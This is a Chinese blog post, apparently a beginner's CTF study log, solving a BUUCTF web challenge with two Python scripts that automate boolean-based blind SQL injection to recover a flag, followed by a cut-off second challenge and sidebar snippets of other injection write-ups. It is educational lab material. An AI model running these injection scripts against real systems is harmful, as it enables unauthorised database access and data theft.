Web安全学习新手入门Week11

最新推荐文章于 2022-05-09 18:06:44 发布
最新推荐文章于 2022-05-09 18:06:44 发布
阅读量2.9k 收藏 1
点赞数
文章标签: web安全 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59271033/article/details/124382254
版权

这周自己找题打 总结总结 要回学校了

1.[CISCN2019 华北赛区 Day2 Web1]Hack World

开局告诉表和字段

然后题目之前说是uuid(uuid是32位随机字符串) 就想到要写脚本来解

输入1 回显有他想要个女朋友

输入2回显要不要做他女朋友

输入0是error啥的

就想到布尔盲注

那就先判断flag长度

import requests
 
url = "http://761df7bf-b293-4bf9-8319-d49755ef57af.node4.buuoj.cn:81/index.php"
len = 1;
while(True):
    data = {"id": f"if(length((select(flag)from(flag)))={len},1,0)"}
    r = requests.post(url,data=data)
    if('Hello, glzjin wants a girlfriend.' in r.text):
        break;
    print(len,end='\n')
    len += 1
print(f"flag长度为{len}")

 然后就上脚本

import requests
import time
import re
url='http://761df7bf-b293-4bf9-8319-d49755ef57af.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1,43):
    max = 126
    min = 33
    for c in range(33,126):
        s = (int)((max+min)/2)
        payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
        r = requests.post(url,data = {'id':payload})
        time.sleep(1)
        if 'Hello, glzjin wants a girlfriend.' in str(r.text):
            max=s
        else:
            min=s
        if((max-min)<=1):
            flag+=chr(max)
            break
print(flag)

 2.[GXYCTF2019]BabySQli

上来是登录框 输入闭合的一些语句没有法

然后就用admin试试

然后看见一些绿绿的

最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf(探险2)
qq_62046696的博客
08-08 842
先上传一个一句话木马.,过滤了然后用可以通过,大概还是过滤了
BUU 刷题小记录
qq_53142368的博客
08-30 177
文章目录前言一、Blacklist二、[RoarCTF 2019]Easy Java三、[GXYCTF2019]禁止套娃 前言 一、Blacklist return preg_match("/select|update|delete|drop|insert|where|./i",$inject); 用这个语句查看过滤 发现过滤了这些 过滤了select 堆叠注入 1’;show tables;%23 1’;show columns from FlagHere; %23 由于过滤了prepare和a
[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入、handler绕过)
笑花大王
02-23 770
简介 今天参加i春秋新春抗疫赛 一道web没整出来 啊啊啊 好垃圾啊啊啊啊啊啊啊 晚上看群里赵师傅的buuoj平台太屌了分分钟上线 然后赵师傅还分享了思路用handler语句绕过select过滤。。。。 原题复现: 考察知识点:SQL注入漏洞-堆叠注入、注入绕过 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台...
buuctf web
CyhDl666的博客
02-01 898
文章目录[GYCTF2020]Blacklist[ZJCTF 2019]NiZhuanSiWei[CISCN2019 华北赛区 Day2 Web1]Hack World [GYCTF2020]Blacklist 注入题 先输入’页面返回报错确定闭合方式 直接准备union注入1' union select 1,2# 返回一个正则表达式return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./
[强网杯2019]随便注(初学者看过来)
xiaobu30的博客
11-15 5060
这是一道web方向的sql注入的题目,通过借鉴各位大佬的博客,我给大家分享我学到的几种方法。 查询 “1” 的时候,会有回显 使用单引号闭合,尝试 “1' and 1 = 2#” (可以将这个理解为万能密码,#会将后面的语句注释掉) , 发现无回显 仅使用单引号注入发现会报sql语法错误 第一种: ...
程序设计入门—Python-week11
08-03
"程序设计入门—Python-week11"这个主题涵盖了多个基础概念,包括计算机的二进制系统、Python语言的特点,以及Python程序的编写和执行。下面将详细讨论这些知识点。 首先,我们来探讨计算机为什么使用二进制而非十...
web week one
01-20
web week one 任务 1.安装phpstudy,python,JAVA(jdk8)并配置好相关的环境,安装常用工具burpsuit,kali等; 2.学习HTTP协议(请求与响应),学习利用burpsuite 实现简单的抓包改包; 3.掌握PHP的基本语法、数据...
机器学习代码week1
最新发布
02-29
机器学习代码week1
08-结构化机器学习项目week11
08-04
08-结构化机器学习项目week11
Java学习心得-Week2
01-20
这周是第二周的学习,基本进入了正轨,老师讲课的节奏我可以适应了,每天上课前老师都会带我们进行归纳复习,并且讲解之前有疑问的问题,我能充分理解课后习题和知识。 这周讲了嵌套循环、函数、递归、数组和面向...
MySQL 数据库 ALTER命令讲解
12-15
MySQL 为关系型数据库(Relational Database Management System), 这种所谓的”关系型”可以理解为”表格”的概念, 一个关系型数据库由一个或数个表格组成。 当我们需要修改数据表名或者修改数据表字段时,就需要使用到MySQL ALTER命令。 开始本章教程前让我们先创建一张表,表名为:testalter_tbl。 root@host# mysql -u root -p password; Enter password:******* mysql> use TUTORIALS; Database changed mysql> create table te
[GYCTF2020]Blacklist 1
m0_62879498的博客
04-28 2453
[GYCTF2020]Blacklist 1 在做本题的时候,我们发现过滤掉了很多的关键字 很多注入方法已经没有办法使用(联合查询 布尔盲注 updataxml的报错注入) 并且发现本关的注入方法为 单引号 只能使用 堆叠注入 来进行查询查寻 库名 表名 1';show databases-- q 库名:supersqli 在这里 因为没有禁用 extractvalue 所以在这里我们可以构造出 extractvalue 报错注入 来查询库名 1' and (extractvalue(1,c
[De1CTF 2019]SSRF Me 1——python代码审计
m0_62879498的博客
05-09 594
[De1CTF 2019]SSRF Me 1 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__)
学习笔记12】buu [De1CTF 2019]SSRF Me
weixin_43553654的博客
05-12 308
打开后看到一堆代码,根本看不懂,不过还好题目上给出了源码的下载位置,并且提示flag is in ./flag.txt,那啥都都不说了,先把源码下载下来吧。 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashl...
第四十五题——[De1CTF 2019]SSRF Me
分享简单的安全技术
04-27 455
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,发现源码的乱码,整理后得到python的flask框架的源码,题目提示flag in ./flag.txt #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os
过滤select|update|delete|drop|insert|where的注入 [ 强网杯 2019]随便注
lonmar的博客
04-08 4579
转载于 攻防世界WP https://adworld.xctf.org.cn/task/writeup?type=web&id=5417&number=3&grade=1&page=1 题目链接https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=541...
随笔2
Rainbow_Melo
08-10 254
堆叠注入 [强网杯 2019]随便注 1';show tables; #回显两表:1919810931114514和words 1';show columns from `table_name`; 获取列名 1919810931114514表中有flag字段 words表中有id和data字段 输入1回显两个数据故查询的是words表 推测内部查询语句为select id,data from words where id='$id' 解: 一、预编译 因为过滤了select等字符,利用char()绕过
GYCTF2020_Writeup
Lethe's Blog
03-15 2521
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
python文件头部#/usr/bin/env python和#coding:utf-8的作用
IT菜鸟
06-15 7482
python文件头部#/usr/bin/env python和#coding:utf-8的作用
深度学习week1-RNN心脏病预测
07-27
你好!对于心脏病预测的问题,使用循环神经网络(RNN)是一种常见的方法。RNN适用于处理序列数据,而心电图信号就是一种序列数据。在使用RNN进行心脏病预测时,你可以将心电图信号作为输入序列,然后通过训练RNN模型来预测患者是否患有心脏病。 首先,你需要准备一个合适的数据集,其中包含心电图信号和相应的心脏病标签。可以使用公开的心电图数据集,如PTB数据库或MIT-BIH数据库。然后,你可以对数据进行预处理和特征工程,如数据清洗、滤波、降采样等。 接下来,你可以构建一个RNN模型。RNN模型由一系列循环层组成,每个循环层都会处理一个时间步的输入数据。你可以选择不同类型的RNN单元,如简单循环单元(SimpleRNN)、长短期记忆网络(LSTM)或门控循环单元(GRU)。通过添加适当的全连接层和激活函数,你可以将RNN模型输出映射到二分类问题(有或无心脏病)的结果。 然后,你可以使用训练集对RNN模型进行训练,并使用验证集进行模型调优。在训练过程中,你可以使用适当的损失函数(如交叉熵)和优化算法(如随机梯度下降)来最小化模型的预测误差。 最后,你可以使用测试集对训练好的模型进行评估,并计算模型的性能指标,如准确率、精确率、召回率等。这些指标可以帮助你评估模型的预测能力和泛化能力。 需要注意的是,心脏病预测是一个复杂的医学问题,仅仅使用心电图信号可能不能得到准确的预测结果。通常情况下,还需要结合其他患者的临床信息和医学知识来进行综合评估。因此,在进行心脏病预测时,建议与专业医生合作,并遵循相关的医学准则和规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值